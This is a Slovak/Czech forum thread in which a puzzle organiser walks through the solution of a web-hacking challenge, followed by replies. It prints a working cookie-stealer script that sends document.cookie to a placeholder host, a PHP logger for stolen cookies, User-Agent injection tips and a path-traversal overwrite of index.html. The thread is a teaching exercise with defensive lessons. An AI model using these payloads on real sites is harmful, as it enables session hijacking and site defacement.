hadanka c.5 - vysvetlenie
******* http://pc.poradna.net/question/view/66560-hadanka-c -5-obnov-stranku *******
ok, vidim ze este nie ste pripraveni na real web hacking a preto dalsia hadanka bude lahsia a bude z kategorie basic web hacking. budem sa tu snazit vysvetlit jednotlive kroky a ich dosah, ale rozhodol som sa, ze vam to nepoviem naraz(mam rad napatie). budem to vysvetlovat po jednotlivych krokoch(celkovo su 3) a s tyzdnovym odstupom, aby ste sa este samostatne mohli(aj ked neskoro) dostat do hall of fame.
1., najprv bolo treba najst dolezitu informaciu, kde je vlastne zaloha povodnych stranok. ta sa nachadzala v subore help.html(bolo treba pozriet do zdrojakov a odscrollovat 
), na hlavnej stranke link - help.
- ponaucenie: aj ked nasi hackeri boli ocividne spicky, urobili jednu podstatnu chybu a to ze dolezite informacie ulozili do html zdrojakov, aj ked si mysleli ze ich nikto nenajde.
2., tu som chybu urobil ja. urobil som sice monitoring navstevnosti, ktory zabezpecoval script monitoring.php ale neuvedomil som si, ze aj informacie typu user_agent mozu byt zneuzite(user agent switcher(ff), proxomitron(proxy server)). tu mi utocnik vlozil cookie stealer a pri prihlaseni sa pod adminom a prezreti si monitoringu som o svoje cookie prisiel. mozny cookie stealer bol:
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>
<script>window.location.href = 'http://nejaka_domena/nejaky_cookie_citac.php?c=' + document.cookie;</script>nejaky_cookie_citac.php mohol vyzerat takto:
<?php
$cookie = $_GET['c'];
$fp = fopen('mycookies.html', 'a');
fwrite($fp, "$cookie\n<br>");
fclose($fp);
?>-ponaucenie: pokial si na svojej stranke zaznamenavate aj informacie typu napr. user_agent, referrer, tak treba mysliet nato, ze aj toto je mozne zneuzit(nie len input z formulara alebo z url) a najlepsie je podla mna zmenit
< a >na znakove entity:
< a >, je s tym najmenej roboty.
3., a mame tu posledny bod. stacilo vojst do admin toolu, zadat meno a heslo, ktore sme adminovi ukradli a ako meno suboru uviest index.html a obsah spravy bol prave povodny html kod index.html v adresari _tmp_. bolo si vsak treba uvedomit ze sme v adresari _tmp_, preto ako meno sme pouzili: ../index.html(relativna cesta o uroven vyssie) alebo sme mohli pouzit absolutnu cestu: index.html. akceptovana bola aj index.html. tymto sme prepisali povodny index.html.
-ponaucenie: davajte si velkeho bacha, ak dovolite zapisovat sobory na vas web, aby tam nahodou niekto nezapisal vlastny php shell. :D
kedy bude dalsie pokracovanie?
to se pozna, ze mam slovenske predky 
som myslel ze az zajtra, ale mozem to v podstate napisat aj dnes.
//edit: slovencina ti fakt ide dobre. mas tam len malu chybicku: slovenskych predkov.
ne ne, v pohode, ja nespecham, ja len, jestli si na to nezabudol
ps: jsem jenom z 1/4 slovak
ps: jsem jenom z 1/4 slovak - po starej mame alebo starom otcovi?
po brachovi![]:)](https://static.poradna.net/images/smiley/evilsmile.gif)
no napadli ma rozne kombinacie. radsej budem ticho.
Mezi smajlíky už podle mě píše česky. Slovensky by bylo: "to sa pozna, ze mam slovenskych predkov" ne?
Číli jeho sdělení je "československé".
Abych rekl popravde ma narodnost je taky slovenska ale slovensky neumim ani prd takze radeji budu mluvit jak mluvim, jakykoliv pokus odemne napsat slovensky cokoliv by vypukl paskvilem.
Pamatuji pratetku ve stavniku kdyz neco chtela a ja nevedel co to je, odpoved vzdy vypadala stylem pokus omyl.
Narodil jsem se v cechach.
vsak ja taky ne
jen sem si to chtel zkusit, ale je to tezsi, nez sem si myslel 
updated, pozri hore.![]:)](https://static.poradna.net/images/smiley/evilsmile.gif)
nabuduce uz bude lahsia a zacneme od zakladov. potom ked budete ready, prejdeme znova na takyto druh hadaniek. 
p.s.: ok, tato hadanka bola dost tazka a chcel som mat od vas na 1/2 roka pokoj.
Kdybych na to měl čas...
Zatím jsem totéž též vypátral. Napnutý jako xˇanda (šle), očekávám happy end 
.
happy end bude. nakoniec zachranime moju deravu stranku.
to tam opravdu stacilo zadat pouhy script? ja sem se tam matlal s onload a ruznyma typama uvozovek, ale to mi zase asi orezal wget
Kazdy cookie stealer je len script (ak chces aby pracoval automaticky pri zobrazeni stranky), dokonca staci ak by to bola linka ale na nu by musel admin kliknut. Dolezite je len ze si odosles cookie na svoj server (kam vedie ta linka). Samozrejme musis mat niekde hosting a tvoj php script ktory ti ten cookie niekde ulozi (to je ten druhy 5riadkovy php script).
cookie stealer jsem mel u sebe na hostingu, to jo. zkousel jsem ho a fungoval. ale ten javascript... melo se to zadat do user-agenta, takze jsem si udelal cmd soubor, do nej jsem dal
ale von me wget jedny uvozovky nak nebral, druhy bral ale nak jinak to neslo, no proste sem neprosel pres svyho wgeta
zkousel jsem i proxytron (nebo jak se to jmenuje), ale ten se mi nepovedlo rozchodit, nak sem vubec nepochopil system tech filtru, tak sem to hned vzdal.
dalsi moznost je samozrejme naky rozsireni do firefoxu, ale ff nepouzivam a instalovat ho.. nechci
proxomitron je uplne easy. ako dobre vies, user agent sa posiela v hlavicke http packetu, takze si to mal nastavit v Headers a tam si mozes pozriet, ako sa to nastavuje napr. pre mozillu a urobit si to podla toho.
Do FF nepotrebujes ziadne rozsirenie, staci ak si useragenta prepises v about:config (vytvoris polozku general.useragent.override).
Ak FF nechces tak to je ale tvoja smola, namiesto 5sekund s FF sa drbes 3dni s nejakymi wget a proximitronmi
updated. btw., pripravil som pre vas dalsie 2 hadanky, ale zacneme od zakladov. nebudu teda take tazke, ale dufam ze sa pri nich dobre pobavite.
tato hadanka bola uz z kategorie realistic.